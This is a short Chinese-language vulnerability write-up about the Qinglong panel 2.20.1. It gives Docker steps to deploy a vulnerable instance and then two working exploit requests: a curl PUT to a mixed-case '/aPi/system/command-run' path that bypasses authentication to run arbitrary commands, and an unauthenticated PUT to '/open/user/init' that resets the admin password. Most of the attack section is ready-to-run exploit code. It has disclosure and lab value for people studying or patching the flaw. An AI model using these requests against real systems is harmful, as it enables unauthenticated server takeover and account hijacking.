青龙面板近期漏洞-202602

目录

  1. 1. 青龙面板
    1. 1.1. 未授权 RCE
      1. 1.1.1. 漏洞描述
      2. 1.1.2. 环境部署
      3. 1.1.3. 漏洞利用
    2. 1.2. 未授权重置用户密码
      1. 1.2.1. 漏洞利用

青龙面板

未授权 RCE

漏洞描述

青龙面板**2.20.1**版本存在一处鉴权漏洞,使用大小写 **aPi绕过接口鉴权,可直接对接口/aPi/system/command-run**造成命令执行

环境部署

拉取 Docker 镜像

docker pull whyour/qinglong:2.20.1

部署容器

docker run -dit \
  -v $PWD/ql/data:/ql/data \
  -p 5700:5700 \
  -e QlBaseUrl="/" \
  -e QlPort="5700" \
  --name qinglong \
  --hostname qinglong \
  --restart unless-stopped \
  whyour/qinglong:2.20.1

漏洞利用

curl -X PUT "http://192.168.31.155:5700/aPi/system/command-run" \     
-H "Content-Type: application/json" \
-d '{"command": "id"}'

未授权重置用户密码

≤2.20.1
2.17.11 可以,再低的没测

漏洞利用

PUT /open/user/init HTTP/1.1
Host: 192.168.31.155:5700
Content-Type: application/json
Content-Length: 65

{
    "username": "admin",
    "password": "pwnedbywebdxg"
}